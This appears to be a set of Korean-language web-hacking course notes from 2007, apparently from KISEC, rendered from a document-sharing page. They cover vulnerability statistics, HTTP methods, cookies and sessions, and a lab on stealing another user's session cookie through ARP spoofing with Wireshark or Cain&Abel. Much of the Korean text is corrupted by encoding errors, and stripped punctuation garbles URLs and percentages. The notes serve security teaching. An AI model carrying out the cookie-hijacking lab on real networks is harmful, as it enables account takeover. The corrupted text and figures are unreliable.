19
๋™ํ–ฅ Vulnerability Stack for Web Security ๋„คํŠธ์›Œํฌ, ์‹œ์Šคํ…œ, ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋ณด์•† ์€ ํ•ญ์‹œ ๋‹ค๋ฃฌ๋‹ค. ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค, ์›น ์„œ๋ฒ„, ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐœ์ธ์ •๋ณด์œ ์ถœ / ํƒˆ์ทจ์‚ฌ๊ฑด ์žฌํŒ๋งค๊ฐ€ ๊ฐ€๋Šฅํ•˜๊ณ  ๋‹จ๊ฐ€๊ฐ€ ๋†’๋‹ค(์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ, ์‹ž์šฉ์นด๋“œ๋ฒˆํ˜ธ) (๊ณต๊ฒฉ๋ฐฉ๋ฒ•์€ ์•…์„ฑ์Šคํฌ๋ฆฝํŠธ/์ˆ™์ฃผ์„œ๋ฒ„)-ifram ํƒœ๊ทธ๋Š” ์œ„ํ—˜ํ•˜๋‹ค. @yahoo.com, @hotmail.com ( ํŒจ์Šค์›Œ๋“œ ์ˆ˜์ง‘ํ•› ๋•Œ ์ž์ฃผ ์‚ฌ์šฉํ•š๋‹ค.) @gmail ์€ ํ˜‘์กฐ์ ์ด๋‹ค. ํƒ์ง€๊ธฐ์ˆ -www.geot.com 90%์ด์ƒ ํƒ์ง€, ํ˜„์žฌ KISA์™€ ํ˜‘์กฐ KISA๋Š” ์ž์ฒด์ ์œผ๋กœ ํƒ์ง€์—”์ง‚์ธ MCFinder๊ฐœ๋ฐœ(ํ˜„์žฌ ๊ตฌ๊ธ€(๋ณธ์‚ฌ)๊ณผ ํ˜‘์กฐ์ฒด์ œ ๊ตฌ์ถ• ์ง‚ํ–‰์ค‘) ์›น ์›œ ์ฆ๊ฐ€ ์ด์— ๋Œ€ํ•š ๋Œ€์‘์œผ๋กœ CAPCHA ๊ธฐ์ˆ  ๋ฐœ์ ‚ End Point ์ทจ์•ฝ์  ์ฆ๊ฐ€ Web Clinet ๋ณด์•†์ˆ˜์ค€ ์ฆ๊ฐ€, End Point ๋ณด์•† ์ˆ˜์ค€ ๊ธฐ์ˆ  ์ฆ๊ฐ€ ์ถ”์„ธ ๊ฐœ์ธ์ •๋ณด ํƒˆ์ทจ ์‚ฌ๋ก€ ๊ฐœ์ธ์ •๋ณด๋ฅผ ๋† ์ฃผ๊ณ  ์‚ฌ๊ฐ€์ง€๊ณ  ์ค‘๊ตญ์— ๋ฆฌ๋‹ˆ์ง€ ๊ฒŒ์ž„๊ณต์žฅ์„ ์ฐจ๋ฆผ(์˜คํ† ๋Ÿฐ) ์•„์ดํ…œ์„ ์„œ์šธ์—์„œ ์•„์ฃผ ๋น„์‹ผ ๊ฐ€๊ฒฉ์— ํŒ๋‹ค. ๊ฐœ์ธํ†ต์žฅ์„ ์ด์šฉํ•ด์„œ ์žกํž˜ (๊ตญ์„ธ์ฒญ์—์„œ ์žก์•˜๋‹ค) ์ผ๋ณธ ๋Œ€๊ธฐ์—… 43๊ฐœ์‚ฌ ๊ฐœ์ธ์ •๋ณด 863๋งŒ๊ฑด ์œ ์ถœ (์นด๋“œ๋ฒˆํ˜ธ, ๊ณ„์ขŒ๋ฒˆํ˜ธ) Web Security Statistics(2006,WASC) Cross-Site-Scripting(85.57%) SQL Injection(26.38%) ์ •๋ณด๋ˆ„์ถœ(15.70%) HTTP Response Splitting(9.76%) Path Traversal(1.19%) Web ์ทจ์•ฝ์  ํ‰๊ท  67%์˜ ์›น ์„œ๋ฒ„, ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์„œ๋ฒ„, ์›น ํด๋ผ์ด์–ถํŠธ๊ฐ€ ์ทจ์•ฝ ์ ‚์ฒด ์ทจ์•ฝ๊ตฎ์ค‘ 63%๊ฐ€ ๋‹ค์Œ 4๊ฐœ ์ทจ์•ฝ์  ์ค‘ ํ•˜๋‚˜์ž„ -file inclusion -sql injection -XSS -Directory Traversal ์ ‚์ฒด ์ทจ์•ฝ๊ตฎ์ค‘ 71%๊ฐ€ ์‰ฝ๊ฒŒ expoit ๊ฐ€๋Šฅ WebApp ์ทจ์•ฝ์ ์ค‘ php๊ฐ€ 30% ์ฐจ์ง€ XSS:19% SQLI:17% File Inclusion:17% Security Essential Security? ์ •๋ณด์ž์‚ฐ์— ๋Œ€ํ•š ๊ธฐ๋ฐ€์„ฑ ๊ฐ€์šฉ์„ฑ ๋ฌด๊ฒฐ์„ฑ ์„ ๋ณด์žฅ ์ •์ฑ… ๋ฐ ์ ƒ์ฐจ โ†’ ๋ฌผ๋ฆฌ์ ๋ณด์•† (๊ฒฝ๊ณ„์„  ๋ณด์•†, ๋„คํŠธ์›Œํฌ ๋ณด์•†, ์„œ๋ฒ„ ๋ณด์•†, ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋ณด์•†, ๋ฐ์ดํ„ฐ ๋ณด์•†) ๊ถ๊ทน์ ์€ ๋ณด์•†์€ ๋ฐ์ดํ„ฐ ๋ณด์•†(์•”ํ˜ธํ™”) System Command ๊ณ„์ • ์ปจํŠธ๋กค(net user/net localgroup) Netcat, tftp, ftp Web Hacking 1์ผ์ฐจ 2007๋…„ 10์›” 22์ผ ์›”์š”์ผ ์˜ค์ ‚ 9:30 kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 1

Web Hacking 1

  • Upload
    others

  • View
    7

  • Download
    0

Embed Size (px)

Citation preview

๋™ํ–ฅ

Vulnerability Stack for Web Security

๋„คํŠธ์›Œํฌ ์‹œ์Šคํ…œ ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋ณด์•† ์€ ํ•ญ์‹œ ๋‹ค๋ฃฌ๋‹ค ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์›น ์„œ๋ฒ„ ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜

๊ฐœ์ธ์ •๋ณด์œ ์ถœํƒˆ์ทจ์‚ฌ๊ฑด

์žฌํŒ๋งค๊ฐ€ ๊ฐ€๋Šฅํ•˜๊ณ  ๋‹จ๊ฐ€๊ฐ€ ๋†’๋‹ค(์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ์‹ž์šฉ์นด๋“œ๋ฒˆํ˜ธ)

(๊ณต๊ฒฉ๋ฐฉ๋ฒ•์€ ์•…์„ฑ์Šคํฌ๋ฆฝํŠธ์ˆ™์ฃผ์„œ๋ฒ„)-ifram ํƒœ๊ทธ๋Š” ์œ„ํ—˜ํ•˜๋‹ค

yahoocom hotmailcom (ํŒจ์Šค์›Œ๋“œ ์ˆ˜์ง‘ํ•› ๋•Œ ์ž์ฃผ ์‚ฌ์šฉํ•š๋‹ค) gmail ์€ ํ˜‘์กฐ์ ์ด๋‹ค

ํƒ์ง€๊ธฐ์ˆ -wwwgeotcom 90์ด์ƒ ํƒ์ง€ ํ˜„์žฌ KISA์™€ ํ˜‘์กฐ

KISA๋Š” ์ž์ฒด์ ์œผ๋กœ ํƒ์ง€์—”์ง‚์ธ MCFinder๊ฐœ๋ฐœ(ํ˜„์žฌ ๊ตฌ๊ธ€(๋ณธ์‚ฌ)๊ณผ ํ˜‘์กฐ์ฒด์ œ ๊ตฌ์ถ• ์ง‚ํ–‰์ค‘)

์›น ์›œ ์ฆ๊ฐ€

์ด์— ๋Œ€ํ•š ๋Œ€์‘์œผ๋กœ CAPCHA ๊ธฐ์ˆ  ๋ฐœ์ ‚

End Point ์ทจ์•ฝ์  ์ฆ๊ฐ€

Web Clinet ๋ณด์•†์ˆ˜์ค€ ์ฆ๊ฐ€ End Point ๋ณด์•† ์ˆ˜์ค€ ๊ธฐ์ˆ  ์ฆ๊ฐ€ ์ถ”์„ธ

๊ฐœ์ธ์ •๋ณด ํƒˆ์ทจ ์‚ฌ๋ก€

๊ฐœ์ธ์ •๋ณด๋ฅผ ๋† ์ฃผ๊ณ  ์‚ฌ๊ฐ€์ง€๊ณ  ์ค‘๊ตญ์— ๋ฆฌ๋‹ˆ์ง€ ๊ฒŒ์ž„๊ณต์žฅ์„ ์ฐจ๋ฆผ(์˜คํ† ๋Ÿฐ) ์•„์ดํ…œ์„ ์„œ์šธ์—์„œ ์•„์ฃผ ๋น„์‹ผ ๊ฐ€๊ฒฉ์— ํŒ๋‹ค

๊ฐœ์ธํ†ต์žฅ์„ ์ด์šฉํ•ด์„œ ์žกํž˜ (๊ตญ์„ธ์ฒญ์—์„œ ์žก์•˜๋‹ค)

์ผ๋ณธ ๋Œ€๊ธฐ์—… 43๊ฐœ์‚ฌ ๊ฐœ์ธ์ •๋ณด 863๋งŒ๊ฑด ์œ ์ถœ (์นด๋“œ๋ฒˆํ˜ธ๊ณ„์ขŒ๋ฒˆํ˜ธ)

Web Security Statistics(2006WASC)

Cross-Site-Scripting(8557)

SQL Injection(2638)

์ •๋ณด๋ˆ„์ถœ(1570)

HTTP Response Splitting(976)

Path Traversal(119)

Web ์ทจ์•ฝ์ 

ํ‰๊ท  67์˜ ์›น ์„œ๋ฒ„ ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์„œ๋ฒ„ ์›น ํด๋ผ์ด์–ถํŠธ๊ฐ€ ์ทจ์•ฝ

์ ‚์ฒด ์ทจ์•ฝ๊ตฎ์ค‘ 63๊ฐ€ ๋‹ค์Œ 4๊ฐœ ์ทจ์•ฝ์  ์ค‘ ํ•˜๋‚˜์ž„

-file inclusion

-sql injection

-XSS

-Directory Traversal

์ ‚์ฒด ์ทจ์•ฝ๊ตฎ์ค‘ 71๊ฐ€ ์‰ฝ๊ฒŒ expoit ๊ฐ€๋Šฅ

WebApp ์ทจ์•ฝ์ ์ค‘ php๊ฐ€ 30 ์ฐจ์ง€

XSS19 SQLI17 File Inclusion17

Security Essential

Security

์ •๋ณด์ž์‚ฐ์— ๋Œ€ํ•š ๊ธฐ๋ฐ€์„ฑ ๊ฐ€์šฉ์„ฑ ๋ฌด๊ฒฐ์„ฑ ์„ ๋ณด์žฅ

์ •์ฑ… ๋ฐ ์ ƒ์ฐจ rarr ๋ฌผ๋ฆฌ์ ๋ณด์•† (๊ฒฝ๊ณ„์„  ๋ณด์•†๋„คํŠธ์›Œํฌ ๋ณด์•†์„œ๋ฒ„ ๋ณด์•†์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋ณด์•†๋ฐ์ดํ„ฐ ๋ณด์•†)

๊ถ๊ทน์ ์€ ๋ณด์•†์€ ๋ฐ์ดํ„ฐ ๋ณด์•†(์•”ํ˜ธํ™”)

System Command

๊ณ„์ • ์ปจํŠธ๋กค(net usernet localgroup)

Netcat tftp ftp

ํ„ฐ๋„๋ง(plink)

Web Hacking 1์ผ์ฐจ

2007๋…„ 10์›” 22์ผ ์›”์š”์ผ

์˜ค์ ‚ 930

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 1

ํ„ฐ๋„๋ง(plink)

ssh scp sftp (๋ฐ”์ด๋„ˆ๋ฆฌ๊ฐ€ ์•„๋‹Œ ์•„์Šคํ‚ค๋กœ ํ†ต์‹ž์„ ํ•˜๊ธฐ ๋•Œ๋ฌธ์—)

Nmap

Windumptcpdumpwireshark

-Follow tcp stream

-Filter out

-Time ํ‘œ๊ธฐ Mark

-Analysis Static

-Sniffer Pro ํ™œ์šฉ

DBMS Basic

-SELECTUPDATEINSERTDELETE

๊ธฐ๋ณธ์—ฐ์‚ฐ์ž

WHRER๊ฒ€์ƒ‰์กฐ๊ฑดHAVING๊ฒ€์ƒ‰์กฐ๊ฑด

์ง‘ํ•ฉ์—ฐ์‚ฐ์ž

-CREATEDROP command

-ACID TRANSACTIONCOMMIT ๊ฐœ๋…

๋ฐฑ์—…์˜ ์ข…๋ฅ˜

-FULL Incremental Differential BACKUP

์›น ๊ธฐ์ดˆ

์›น ๋ธŒ๋ผ์šฐ์ € rarr ๋ฐฉํ™”๋ฒฝ rarr ์›น ์„œ๋ฒ„ rarr ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ rarr ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค

http wwwsitecom showtablesasppage=1 amp name=username

(๋ฐฉํ™”๋ฒฝ)(์›น์„œ๋ฒ„) (์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜) (๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค)

Special Char amp = +

Escape parser ampใ…ก

amplt = lt (Less than) ํด๋ผ์ด์–ถํŠธ์ธต์—์„œ ์‹คํ–‰์•†๋˜๊ฒŒ ํ•˜๊ธฐ ์œ„ํ•ด์„œ ์“ด๋‹ค

์‹œ๋Œ€๋ณ„ ๋“ฑ์žฅ ๊ธฐ์ˆ 

HTTP ํ”„๋กœํ† ์ฝœ ๋ช…์„ธ

HTML CSS

SCRIPTS JAVASCRIPTSVB

CGI C PERL

APPLET ACTIVE X ํด๋ผ์ด์–ถํŠธ ์ธก ์ž๋™ํ™”

HTTPS SSLTLS

์›น์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋“ฑ์žฅ ์„œ๋ฒ„์ธก ์ž๋™ํ™”(ASPPHPJSP)

XML SHTML ๋ฐ์ดํ„ฐ ์ €์žฅampํ†ต์‹ž ํฌ๋งท ์ค‘์‹œ

WEB SERVICEAJAX SOAP WSDL UDDI

CGI(Common Gate Interface)

-์›น ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์œผ๋กœ ์ •๋ณด๋ฅผ ์ ‚๋‹ฌํ•˜๊ณ  ์ ์ ƒํ•š ํ˜•ํƒœ๋กœ ์ •๋ณด๋ฅผ ๋ธŒ๋ผ์šฐ์ €์—๊ฒŒ ๋ฐ˜ํ™˜ํ•˜๊ธฐ ์œ„ํ•š ํ†ต์‹ž๊ทœ

์•ฝ(ํ‘œ์ค€)

-CGI๋Š” ์–ถ์–ด๊ฐ€ ์•„๋‹ˆ๋ผ ์ผ์ข…์˜ ํ†ต์‹ž ์ง€์นจ์„œ

-CGI์ง€์› ์–ถ์–ด์Šคํฌ๋ฆฝํŠธ (PERL C C++ JAVA PHP ASP JSCRIPT)

-์›น ํด๋ผ์ด์–ถํŠธ๋Š” HTTPFORM์˜ ํ˜•ํƒœ๋กœ ์›น ์„œ๋ฒ„์—๊ฒŒ ์ •๋ณด ์ ‚์†ก

-์›น ์„œ๋ฒ„๋Š” ํด๋ผ์ด์–ถํŠธ๋กœ๋ถ€ํ„ฐ ๋“ค์–ด์˜จ ์š”์ฒญ๊ณผ ํ™˜๊ฒฝ๋ณ€์ˆ˜ ์˜ ๊ฐ’์„ ์ฑ„์›Œ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์œผ๋กœ ์ ‚๋‹ฌ

-์Šคํฌ๋ฆฝํŠธ๋‚˜ ์ผ๋ฐ˜ LANGUAGE๋กœ CGI๋กœ ์ž‘์„ฑ์‹œ

Content-type texthtmlnn ํ—ค๋” ๋ฐ˜๋“œ์‹œ ๋ฐ˜ํ™˜ํ•˜์—ฌ์•ผ ํ•จ

ํ™˜๊ฒฝ๋ณ€์ˆ˜

SERVER_SOFTWARE REMOTE_HOST

QUERY_STRING REMOTE_ADDR

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 2

QUERY_STRING REMOTE_ADDR

SERVER_PORT HTTP_USER_AGENT

REQUEST_METHOD

CONTENT_TYPE

CONTENT_LENGTH

HTTP

HTTP(HYPERTEXT TRANSFER PROTOCOL)

-TCP ๊ธฐ๋ฐ˜์˜ ํ”„๋กœํ† ์ฝœ

-REQUEST ์™€ RESPONSE์˜ ๊ตฌ์กฐ๋กœ ๋˜์–ด ์žˆ์Œ

-STATELESS ํ•š ํ”„๋กœํ† ์ฝœ(REQUEST ์™€ RESPONSE๊ฐ€ ์ด๋ฃจ์–ด์ง€๋ฉด ์ ‘์†์ด ์ข…๋ฃŒ๋จ (HTTP10)

๊ธฐ๋ณธ์šฉ์–ด

URI (Uniform Resource Idenifier)

-์ธํ„ฐ๋„ท ์ƒ์˜ ์ž์›์„ ์‹๋ณ„ํ•˜๊ธฐ ์œ„ํ•š ๋ฌธ์ž์—ด

URL(Uniform Resource Locator)

-์ž์›์˜ ์œ„์น˜ ์ •๋ณด๊ฐ€ ์ค‘์š”

-httpwwwsitecomsearchasp

URL(Uniform Resource Name)

-์ž์›์˜ ์œ„์น˜์™€ ์ƒ๊ด€์—†์ด ์ž์ฒด์˜ ์ •๋ณด๊ฐ€ ์ค‘์š”ํ•˜๋‹ค

-urnisbn021702452

HTTP ํ”„๋กœํ† ์ฝœ ํ†ต์‹ž ๋ฐฉ์‹

HTTPResposeHeader

HTTPRequestHeader

HTTP 10

ํ•˜๋‚˜์˜ ๋ฌธ์„œ์— ๊ทธ๋ฆผ์ด ํ•˜๋‚˜ ์žˆ๋”๋ผ๋„ ์ตœ์ดˆ ํ…์ŠคํŠธ๊ฐ€ ์ €์žฅ๋œ HTTP ๋ฌธ์„œ๋ฅผ ์ ‚์†ก๋ฐ›๊ณ  ๋‚œ ๋’ค ์—ฐ๊ฒฐ์„ ๋Š๊ณ  ๊ทธ๋ฆผ์„

๋ฐ›๊ธฐ ์œ„ํ•ด ๋‹ค์‹œ ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•š ํ›„ ๊ทธ๋ฆผ์„ ์ ‚์†ก๋ฐ›๋Š”๋‹ค

HTTP11

์—ฐ์†๋œ ์—ฐ๊ฒฐ ์š”์ฒญ์ด ์žˆ์„ ๊ฒฝ์šฐ์— HTML ๋ฌธ์„œ๋ฅผ ๋ฐ›๊ณ  ๋‚œ ๋’ค ์—ฐ๊ฒฐ์„ ๋Š๊ณ  ๋‹ค์‹œ ์—ฐ๊ฒฐ์„ ์š”์ฒญํ•˜์ง€ ์•Š๊ณ  ๋ฐ”๋กœ ๊ทธ๋ฆผ ํŒŒ์ผ

์„ ์š”์ฒญํ•š๋‹ค

HTTP 11์˜ Method

Method ์„ค๋ช…

GET ์ž์›์š”์ฒญ

POST ENTITY๋ฅผ ํฌํ•จํ•š ์ž์› ์š”์ฒญ

HEAD HTTP HEADER ์ •๋ณด๋งŒ ์ˆ˜์‹ž

TRACE Request์˜ ๋ฃจํ”„๋ฐฑ ํ…Œ์ŠคํŠธ

PUT URL์— ์ž์›์„ ์ƒ์„ฑ

DELETE URL์˜ ์ž์›์„ ์‚ญ์ œ

OPTIONS ์‘๋‹ต ๊ฐ€๋Šฅํ•š HTTP๋ฉ”์†Œ๋“œ๋ฅผ ์š”์ฒญ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 3

OPTIONS ์‘๋‹ต ๊ฐ€๋Šฅํ•š HTTP๋ฉ”์†Œ๋“œ๋ฅผ ์š”์ฒญ

CONNECT ํ„ฐ๋„๋ง์˜ ๋ชฉ์ ์œผ๋กœ ์—ฐ๊ฒฐ์š”์ฒญ(Proxy ์—ฐ๊ฒฐ)

GETPOST ๋ฉ”์†Œ๋“œ

GET๊ณผ POST๋Š” ์„œ๋ฒ„์— ์ž์›์„ ์š”์ฒญํ•›๋•Œ ์‚ฌ์šฉ๋จ

GET๋ฐฉ์‹ POST๋ฐฉ์‹

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•˜๊ณ ์žํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ URL ์— ํฌํ•จ์‹œํ‚ด

์ ‚์†กํ•› ์ˆ˜ ์žˆ๋Š” ๋ฐ์ดํ„ฐ๋Ÿ‰์ด ์ œํ•š๋จ(2K4K)

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•› ๋ฐ์ดํ„ฐ๋ฅผ REQUEST Body์— ํฌํ•จ์‹œํ‚ด

๋ฐ์ดํ„ฐ ์ ‚์†ก๋Ÿ‰์˜ ์ œํ•š์ด ์—†์Œ(์‹œ๊ฐ„์ œํ•š๊ฐœ๋…)

GET loginaspuser_id=adminampuser_pass=1234

HOSTwwwsitecom

POST loginasp HTTP11

HOSTwwwsiteorg

User_id=admin user_pass=1234

get๋ฐฉ์‹(์›น ๋กœ๊ทธ๋Š” 8000์ž ๊นŒ์ง€๋งŒ ์ €์žฅํ•š๋‹ค)

HEAD ๋ฉ”์†Œ๋“œ

TRACE ๋ฉ”์†Œ๋“œ

WEBDAV ๊ด€๋ ฆ๋ฉ”์†Œ๋“œ

PUT

COPY

MOVE

DELETE

MAKECOL

PUT๋ฉ”์†Œ๋“œ ์‚ฌ์šฉ์˜ˆ์ œ

PUT HTTPWWWKISECCOMindex11html HTTP1O

HOSTWWWKISECCOM

Content-Length30

User-AgentBlaBla Client

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 4

User-AgentBlaBla Client

HTTP RESPONSE์˜ ์ฃผ์š” ์‘๋‹ต ์ฝ”๋“œ

์ฃผ์š” ์‘๋‹ต์ฝ”๋“œ

200 OK 400 BadRequest

201 Created 401 Unauthorized

202 Accepted 403 Forbidden

404 Not Found 301 Moved permanently

302 Found 500 Internal Server Error

HTTP ๊ด€๋ ฆ ๊ธฐ์ˆ 

์ฟ ํ‚ค

94๋…„ ๋„ท์Šค์ผ€์ดํ”„์—์„œ ๊ฐœ๋ฐœ

์„œ๋ฒ„๊ฐ€ ์ƒ์„ฑํ•˜๊ณ  ํด๋ผ์ด์–ถํŠธ์— ์ €์žฅ์‹œํ‚ค๋Š” ๋ฐฉ์‹

์ €์žฅ์˜๊ตฌ์ (Persistent๋””์Šคํฌ)๋ฐ˜์˜๊ตฌ์ (Non-Persistent ๋ฉ”๋ชจ๋ฆฌ)

๋ณด์•†๋ณด์•†๋น„๋ณด์•†

์ œํ•šํฌ๊ธฐ์ œํ•š(4k)๋ณ€์ˆ˜์ œํ•š(2k)

ํ•š๋ฒˆ ์ €์žฅ๋œ ์ฟ ํ‚ค๋Š” ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„์ด ์ง€๋‚˜์ง€ ์•Š๋Š” ํ•š ํ•ด๋‹น ๋„๋ฉ”์ธ์— ์ ‘์†์‹œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ž๋™์œผ๋กœ ํƒ‘์žฌํ•˜์—ฌ ์ ‚์†ก

ํ•˜๊ฒŒ ๋จ

์ฟ ํ‚คํŒŒ์ผํ˜•ํƒœ์‚ฌ์šฉ์ž์ด๋ฆ„์ ‘์†ํ•š์‚ฌ์ดํŠธ

์ฟ ํ‚คํŒŒ์ผ๋‚ด์šฉ๊ฐœ๋ฐœ์ž๊ฐ€ ์„ค์ •ํ•˜๊ธฐ ๋‚˜๋ฆ„

๋””ํดํŠธ ๋””๋ ‰ํ† ๋ฆฌ CDocuments and Setting์‚ฌ์šฉ์ž์ด๋ฆ„Cookies

๊ธฐ๋ณธํฌ๋งท

Set-cookie

Name=value ์ฟ ํ‚ค์˜ ์ด๋ฆ„

Expire=date ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„

Domain=domain ๋„๋ฉ”์ธ

Path=path ์ฟ ํ‚ค๋ฅผ ์ด์šฉํ•˜์—ฌ ์ ‘์†์‚ฌ๋Šฅํ•š URL

Secure ๋ณด์•†๋น„๋ณด์•†์„ค์ •

๊ด€๋ ฆ ISSUE

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘ ๋ฐ ์Šค๋‹ˆํ•‘ ํ”„๋ก์‹œ ๋“ฑ์„ ํ†ตํ•š ๋ณ€์กฐ๊ฐ€๋Šฅ

XSS๋“ฑ์„ ํ†ตํ•š ํƒ€์ธ์˜ ์ฟ ํ‚คํƒˆ์ทจ

์žฌ์ƒ๊ณต๊ฒฉ์— ๋ฌด๋ฐฉ๋น„

๋Œ€์‘๋ฐฉ์•† ์ฟ ํ‚ค๋Š” ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋Š” ๊ธฐ๋ณธ ์ฒ ์น™ ์‚ฌ์šฉํ•› ๊ฒฝ์šฐ ๊ฒ€์ฆ๋œ ์•”ํ˜ธํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜์œผ๋กœ ์ตœ์†Œํ•š์˜ ์ •๋ณด๋งŒ

์ €์žฅ ์ฟ ํ‚ค์˜ ๋ฌด๊ฒฝ์„ค ๊ฒ€์‚ฌ๋ฅผ ์œ„ํ•ด ์ ‚์†ก๋˜๋Š”(ํŠน์ • ๋ณ€์ˆ˜ ๊ฐ’+TimeStamp)๋“ฑ์˜ ์ •๋ณด๋ฅผ ํ•ด์‹œํ•š ๊ฐ’๊นŒ์ง€ ๊ฐ™์ด

์ ‚์†ก ์™„๋ฒฝํ•˜์ง‚ ์•Š์œผ๋‚˜ ์„ธ์…˜๊ณผ ๊ฐ™์ด ๋ณ‘ํ–‰์‹œ ๋ณด์•†์„ฑ ํ–ฅ์ƒ

์„ธ์…˜(SESSION)

HTTP์ ‘์† ์„ธ์…˜์— ๋Œ€ํ•š ์ฒ˜๋ฆฌ๋ฅผ ๋‹ด๋‹นํ•˜๋Š” ๊ธฐ์ˆ 

Server Side ๊ธฐ์ˆ ๋กœ HTTP์˜ Stateless ํ•š ํŠน์„ฑ์„ ๋ณด์™„ํ•˜๊ธฐ ์œ„ํ•ด Uniq ํ•š ID๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ํ˜„์žฌ ์ ‘์†ํ•š ํด๋ผ์ด์–ถํŠธ์—๊ฒŒ

ํ•›๋‹นํ•ด์ฃผ๊ณ  ๊ธฐ์–ตํ•˜๋Š” ๋ฐฉ์‹

๊ณผ๊ฑฐ cookie์— ์ €์žฅํ•˜๋˜ ๋ณ€์ˆ˜ ๊ฐ’ ์„ ์ดˆ๊ธฐ ์ ‘์† ์‹œ ํ•›๋‹นํ•˜๊ฒŒ ๋จ

ํ•›๋‹นํ•š ๋ณ€์ˆ˜๋Š” ์„œ๋ฒ„์— ์ €์žฅ๋˜๋ฉฐ ํด๋ผ์ด์–ถํŠธ ์ธก ์—๋Š” ์„ธ์…˜ ID๋งŒ ๋ถ€์—ฌ๋จ

์ฃผ๋กœ Web Application Server ๋‚˜ Web Server ๋ฅผ ํ•›๋‹น ๋ฐ›์œผ๋ฉฐ ์ด๋•Œ ํ•ด๋‹น ID์— ํŠน์ • ์ •๋ณด๋ฅผ ์ €์žฅํ•› ์ˆ˜ ์žˆ์Œ

ํด๋ผ์ด์–ถํŠธ๋Š” ์„œ๋ฒ„์™€ ํ†ต์‹ž์‹œ SESSION ID๋งŒ ์ฃผ๊ณ  ๋ฐ›์Œ

์„ธ์…˜ID

WASWS ์„ธ์…˜ ID๋ณ€์ˆ˜

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 5

IIS ASPSESSIONID

APACHE SESSIONID

TOMCAT JSESSIONID

PHP PHPSESSID

๊ธฐํƒ€ JServerSessionID

JWSESSIONID

SESSID

SESSION

SID

SESSION_ID

์„ธ์…˜

WASWS ๋งˆ๋‹ค ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต 10๋ถ„20๋ถ„ ์„ค์ •์ž„

์‚ฌ์šฉ์ž๊ฐ€ ๋น„์ •์ƒ ๋กœ๊ทธ์•„์›ƒ ํ•˜๊ฑฐ๋‚˜ Request ์š”์ฒญ ์—†์„ ์‹œ ์œ„ ํƒ€์ž„ ์•„์›ƒ ๊ฐ’ ์ดˆ๊ณผ ํ›„ ํ•ด๋‹น ์„ธ์…˜ID๋Š” ์†Œ๋ฉธ

์„ธ์…˜๋„ ์ฟ ํ‚ค์™€ ๊ฐ™์€ ์œ ํšจ๊ธฐ๊ฐ„ ์žˆ์Œ

๊ด€๋ ฆ ISSUE

์ดˆ๊ธฐ์„ธ์…˜๊ฐ์ฒด ์ƒ์„ฑ์‹œ ํด๋ผ์ด์–ถํŠธ์˜ IP ๋ฉ”์ธ๋ณด๋“œSN ํ•˜๋“œ๋””์Šคํฌ SN๋“ฑ Uniq ํ•š ๊ฐ’์„ ์„ค์ •ํ•š ํ›„ ๋งค ํŽ˜์ด์ง€๋งˆ๋‹ค

์ธ์ฆ๋น„๊ต๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์˜ˆ๋ฐฉํ•› ์ˆ˜ ์žˆ์Œ

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘์„ ํ†ตํ•š ๊ณต๊ฒฉ์‹œ๋„

์„ธ์…˜ ์ดˆ๊ธฐ ์ƒ์„ฑ์‹œ๋งˆ๋‹ค ์ƒˆ๋กœ์šด ID๋ฅผ ์ƒ์„ฑ

์žฌ์ƒ๊ณต๊ฒฉ

์‹ค์Šต

Cookie๊ฐ’์„ ์Šค๋‹ˆํ•‘ ํ•ด์„œ ์ƒ๋Œ€๋ฐฉ Cookie๊ฐ’์œผ๋กœ ์ƒ๋Œ€๋ฐฉ ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธ

์‹ค์Šตํ™˜๊ฒฝWinArpSpoof or CainampAbel or wireshark

Wireshark๋กœ arp ์Šคํ‘ธํ•‘์„ ํ•ด์„œ ํŒจํ‚ท์ด ๋‚˜์—๊ฒŒ ๋„˜๊ฒจ์˜ค๊ฒŒ ๋งŒ๋“ž๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 6

